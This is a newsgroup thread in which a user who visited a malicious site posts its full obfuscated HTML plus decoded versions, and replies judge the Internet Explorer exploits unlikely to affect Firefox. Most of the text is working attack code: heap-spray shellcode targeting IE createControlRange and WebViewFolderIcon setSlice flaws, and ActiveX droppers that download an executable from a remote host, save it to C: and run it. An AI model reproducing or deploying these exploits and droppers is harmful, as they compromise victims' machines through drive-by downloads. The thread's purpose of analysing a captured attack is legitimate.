Could this exploit code from a malware site affect Firefox?
OMA
to www.duhymn.hk (be careful NOT to enter that site with a browser).
When I entered the site with Firefox 2.0.0.4, the browser immediately froze,
so I had to manually terminate it with the Task Manager (Windows XP).
Then I thought that it could to be a malware site, so I tried to download
its main page outside any browser to avoid executing it again.
I got the following code from the "index.htm" page:
___
<html>
<body>
<script>
document.write(unescape("%3c%73%63%72%69%70%74%3e%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25
%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65
%25%75%30%30%34%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38
%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30%30%30%37%25%75%30%30%30%30%25%75%37%32
%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25%75%30
%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75
%31%33%65%38%25%75%30%30%30%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25
%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36%66%35%34%25%75%36%39%34%36
%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30
%30%25%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30
%36%61%25%75%30%30%36%61%25%75%30%39%65%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35
%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36%61%35%31%25%75
%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25
%75%65%38%30%30%25%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63
%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30%30%25%75%30%30%62%65%25%75%30%30%30
%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62%31
%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36
%32%36%39%25%75%36%31%37%32%25%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75
%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34%35%25%75%37%34%36%39%25
%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38
%25%75%37%30%37%34%25%75%32%66%33%61%25%75%37%32%32%66%25%75%37%34%36%36%25%75%37%35%36
%38%25%75%32%65%36%34%25%75%36%66%36%33%25%75%32%66%36%64%25%75%36%31%36%64%25%75%32%65
%36%65%25%75%37%38%36%35%25%75%30%30%36%35%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30
%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%36%30%30%30%25%75
%38%62%36%34%25%75%33%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25
%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25%75%30%38%35%62%25%75%64%61%38%39
%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33
%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30
%37%33%25%75%37%62%38%62%25%75%30%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30
%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25%75%31%33%31%65%25%75
%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25
%75%35%39%35%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62
%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63%31%30%37%25%75%30%32%65%30%25%75%37%33%38
%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25%75%38%35
%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32
%64%62%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75
%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37%32%35%30%25%75%36%33%36%66%25
%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30
%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%30%64%30%64%25%75%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65
%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73%75%62%73%74%72%69
%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20
%41%72%72%61%79%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69
%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69%6c%28%30%78%64%30%64%30%64%30%64%29%3b
%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73
%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d
%42%31%43%33%2d%30%44%45%37%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e
%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74%73%5b%30%5d%2e%63%72%65%61
%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63
%68%28%65%29%7b%7d%0a%3c%2f%73%63%72%69%70%74%3e"));
</script>
<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d
%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61
%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69
%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a
%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d
%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%73%74%79
%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%31%32%33%2e%68%74%6d%22%29
%7d%20%3c%2f%73%74%79%6c%65%3e%0a"));
</script>
We are currently testing a new browser feature. If you are not able to view
this ecard, please <a href="/ecard.exe">click here</a> to view in its
original format.
</body>
</html>
___
The fact that the code is obfuscated like this hints that it's a malware
site. After "unescaping" both encoded lines, I got the following code:
___
<html>
<body>
<script>
try{x=unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ce%u0040%ucce8%u0000
%u8d00%u5e85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011e%u0000%uc389%u858d%u131e
%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%ue853%u00f8
%u0000%u9090%u8d8d%u127f%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078%u6a51
%uff00%u8dd0%u6b85%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e%ue800%u00be%u0000
%u858d%u1273%u0040%u006a%ub1e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6957%u456e
%u6578%u0063%u7845%u7469%u7250%u636f%u7365%u0073%u7468%u7074%u2f3a%u722f%u7466%u7568%u2e64
%u6f63%u2f6d%u616d%u2e6e%u7865%u0065%u0000%u0000%u0000%u0000%u0000%u0000%u6000%u8b64%u301d
%u0000%u8b00%u0c5b%u5b8b%u8b1c%u8b1b%u085b%uda89%u9d89%u132d%u0040%u7b8b%u013c%u03d7%u785f
%u4b8b%u8b18%u2073%u7b8b%u0124%u01d6%ufcd7%u01ad%u51d0%u9657%ubd8d%u131e%u0040%u0fb9%u0000
%uf300%u96a6%u595f%u0674%u4747%ue4e2%uc4eb%uc031%u8b66%uc107%u02e0%u738b%u011c%u01d6%uadc6
%ud001%u8589%u1331%u0040%uc361%uff50%u2db5%u4013%uff00%u3195%u4013%uff00%u47e0%u7465%u7250
%u636f%u6441%u7264%u7365%u0073%u0000%u0000%u0000%u0000");
y=unescape("%u0d0d%u0d0d");
while(y.length<0x40000)y+=y;y=y.substring(0,0x3ffe4-x.length);
o=new Array();for(i=0;i<450;i++)o[i]=y+x;z=Math.ceil(0xd0d0d0d);
document.write('<object></object>');
z=document.scripts[0].createControlRange().length;}catch(e){}
</script>
<iframe src="exp1.htm"></iframe>
<iframe src="exp2.htm"></iframe>
<iframe src="exp3.htm"></iframe>
<style> * {CURSOR: url("123.htm")} </style>
We are currently testing a new browser feature. If you are not able to view
this ecard, please <a href="/ecard.exe">click here</a> to view in its
original format.
</body>
</html>
___
So as you can see there is yet another unescape line with encoded stuff even
after decoding the previous unescape lines. I don't know how to decode this
latter unescape line, since it has a diferent encoding. The iframes contain
three pages named "exp1.htm", "exp2.htm" and "exp3.htm" ("exp" probably
stands for "exploit") which contain even more unescape("%") lines with
encoded stuff. After decoding the text included inside those unescape lines,
I got the following:
From the "exp1.htm" page:
___
<html>
<body>
<script>
// S мент рий н х :) -->
var xname='ob'+'j';
var obj_RDS = document.createElement(xname+'ect');
var ids='i'+'d';
var xrds='R'+'DS';
obj_RDS.setAttribute(ids,'obj_'+xrds);
var cls_id1='cl'+'si'+'d:BD'+'96C5';
var cls_id2='56'+'-65'+'A3-11'+'D0-983A'+'-00C04'+'FC29E36';
obj_RDS.setAttribute('classid',cls_id1+cls_id2);
var is__obj_adodb = 0;
// S мент рий н х :) -->
var xname_str="ad"+"odb.s"+"tream";
try { var obj_adodb = obj_RDS.CreateObject(xname_str,"");
is__obj_adodb = 1; } catch(e){} if (is__obj_adodb != 1)
{ try { var obj_adodb = new ActiveXObject(xname_str); is__obj_adodb = 1; }
catch(e){} }
if (is__obj_adodb == 1) { try {
var appl_="Sh"+"el"+"l.App"+"lica"+"tion";
var obj_ShellApp = obj_RDS.CreateObject(appl_,"");
var xml_name="ms"+"xm"+"l2.X"+"MLH"+"TTP";
var obj_msxml2 = new ActiveXObject(xml_name);
// S мент рий н х :) -->
obj_msxml2.open("G"+"ET","%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ca%u0040%ucbe8
%u0000%u8d00%u5a85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u0000%uc389%u858d
%u1319%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%ue853
%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078
%u6a51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e%ue800%u00bd
%u0000%u858d%u126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6957
%u456e%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u6672%u6874%u6475
%u632e%u6d6f%u6d2f%u6e61%u652e%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6460%u1d8b
%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03
%u8b78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001%u5751%u8d96%u19bd%u4013%ub900%u000f
%u0000%ua6f3%u5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0c1%u8b02%u1c73%ud601%uc601
%u01ad%u89d0%u2c85%u4013%u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%ue0ff%u6547%u5074
%u6f72%u4163%u6464%u6572%u7373%u0000%u0000%u0000%u0000%u9000",false);
// S мент рий н х :) -->
obj_msxml2.send();
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
// S мент рий н х :) -->
var fn = "C:\\xx1232255"+".e"+"xe"; obj_adodb.SaveToFile(fn,2);
obj_adodb.close(); obj_ShellApp.ShellExecute(fn); } catch(e){} } </script>
</body>
</html>
___
From the "exp2.htm" page:
___
<script>
function CreateO(o, n)
{ var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) { try { eval('r = o.CreateObject(n, "")') }
catch(e){} } if (! r)
{ try { eval('r = o.CreateObject(n, "", "")') }
catch(e){} } if (! r)
{ try { eval('r = o.GetObject("", n)') }catch(e){} }
if (! r) { try { eval('r = o.GetObject(n, "")') }catch(e){} }
if (! r) { try { eval('r = o.GetObject(n)') }catch(e){} } return(r); }
function Go(a) {
var xml_namea="ms"+"xm"+"l2"+".XM"+"L"+"HT"+"TP";
var obj_msxml2 = CreateO(a,xml_namea);
obj_msxml2.open("GE"+"T","%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ca%u0040%ucbe8
%u0000%u8d00%u5a85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u0000%uc389%u858d
%u1319%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%ue853
%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078
%u6a51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e%ue800%u00bd
%u0000%u858d%u126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6957
%u456e%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u6672%u6874%u6475
%u632e%u6d6f%u6d2f%u6e61%u652e%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6460%u1d8b
%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03
%u8b78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001%u5751%u8d96%u19bd%u4013%ub900%u000f
%u0000%ua6f3%u5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0c1%u8b02%u1c73%ud601%uc601
%u01ad%u89d0%u2c85%u4013%u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%ue0ff%u6547%u5074
%u6f72%u4163%u6464%u6572%u7373%u0000%u0000%u0000%u0000%u9000",false);
obj_msxml2.send();
var ad_name="ad"+"od"+"b."+"str"+"eam";
var obj_adodb = CreateO(a,ad_name);
obj_adodb.type = 1; obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\88996661.exe";
obj_adodb.SaveToFile(fn,2);
var s = CreateO(a, "Sh"+"el"+"l.Ap"+"plicat"+"ion");
s.ShellExecute(fn); return TRUE; }
var i = 0;
var x1='{BD9'+'6C556-65A'+'3-11D0-983A-0'+'0C04F'+'C29E30}';
var x2='{B'+'D96C556-65A3'+'-11D0-983A-00'+'C04FC2'+'9E36}';
var x3='{AB9B'+'CEDD-EC'+'7E-47E1-93'+'22-D4A210617116}';
var x4='{0006F0'+'33-0000-00'+'00-C000-0000'+'00000046}';
var x5='{0006F03A-0000-00'+'00-C000-000000000046}';
var x6='{6e32070a-766d-4e'+'e6-879c-dc1f'+'a91d2fc3}';
var x7='{6'+'414512'+'B-B978-451D-A0D8-FCFDF33E833C}';
var x8='{7F5B'+'7F63-F06F'+'-4331-8A26-339E0'+'3C0AE3D}';
var x9='{06723E09-F4C'+'2-43c8-8358-09FCD'+'1DB0766}';
var x10='{639F725'+'F-1B2D-4831-A9'+'FD-874847682010}';
var x11='{BA0185'+'99-1DB3-44f9-83B'+'4-461454C84BF8}';
var x12='{D0C07D'+'56-7C69-43F1-B4'+'A0-25F5A11FAB19}';
vae x13='{E8CCC'+'DDF-CA28-496b-B'+'050-6C07C962'+'476B}';
var t = new Array( x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12,
x13,null);
while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a =
document.createElement("object"); a.setAttribute("cl"+"ass"+"id",
"cls"+"id:" + t[i].substring(1, t[i].length - 1)); }
else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var
b = CreateO(a, "Sh"+"ell.Ap"+"plication");
if (b) { if (Go(a)) break; } }catch(e){} } i++; } </script>
___
From the "exp3.htm" page:
___
<script>
var heapSprayToAddress = 0x05050505;
var shellcode =
unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ca
%u0040%ucbe8%u0000%u8d00%u5a85%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u0000
%uc389%u858d%u1319%u0040%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c
%u0041%ue853%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74
%u6e69%u0078%u6a51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e
%ue800%u00bd%u0000%u858d%u126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972
%u0041%u6957%u456e%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u6672
%u6874%u6475%u632e%u6d6f%u6d2f%u6e61%u652e%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000
%u6460%u1d8b%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u8908%u89da%u289d%u4013%u8b00%u3c7b
%ud701%u5f03%u8b78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001%u5751%u8d96%u19bd%u4013
%ub900%u000f%u0000%ua6f3%u5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0c1%u8b02%u1c73
%ud601%uc601%u01ad%u89d0%u2c85%u4013%u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%ue0ff
%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u0000%u0000%u0000%u0000%u9000");
var heapBlockSize = 0x400000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
for ( i = 0 ; i < 128 ; i++)
{
try
{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}
catch(e){}
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script>
___
I'm not savvy enough to tell what all that code does. It seems it tries to
download and execute an EXE file in the root dir of C: (named
"C:\88996661.exe") but I haven't found that file in my computer (maybe I
terminated Firefox before it could download the EXE file, but I'm not sure
if that code could do any other harmful thing to my system)
I'd like to know if that code could exploit any vulnerability in Firefox,
and thus if it may have affected my system. I was running as an Admin user
when that happened. My antivirus doesn't seem to find anything.
Thank you,
OMA
Chris Jahn
news:qfqdnQjMOOgmsOLb...@mozilla.org:
> I'd like to know if that code could exploit any vulnerability
> in Firefox, and thus if it may have affected my system. .
>
No. In IE, clicking on the executable would run it. In FF, you
can only download an executable file, then you have to browse to
the saved file and click it yourself, manually.
--
Mozilla & Netscape FAQs: http://www.ufaq.org/
Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/
Web page validation: http://validator.w3.org
About Mozilla: http://www.mozilla.org
Ambition is a poor excuse for not having the good sense to be
lazy.
Aggro
> Hello, I've accidentally entered a malware site by following an e-mail link
> to www.duhymn.hk (be careful NOT to enter that site with a browser).
> When I entered the site with Firefox 2.0.0.4, the browser immediately
> froze,
There seems to be a large loop. That probably caused your browser to
froze. Frozing is not an indication that they managed to do something to
your computer.
It looks like "Internet Explorer createControlRange Object Buffer
Overflow":
http://www.juniper.net/security/auto/vulnerabilities/vuln1850.html
So probably only IE users are in danger. I didn't read the whole code,
so I don't know if there is something else also. But I very much doubt
that you would be in danger as you were using 2.0.0.4.
--
Solutions for issues with Firefox:
http://kb.mozillazine.org/Category:Issues_%28Firefox%29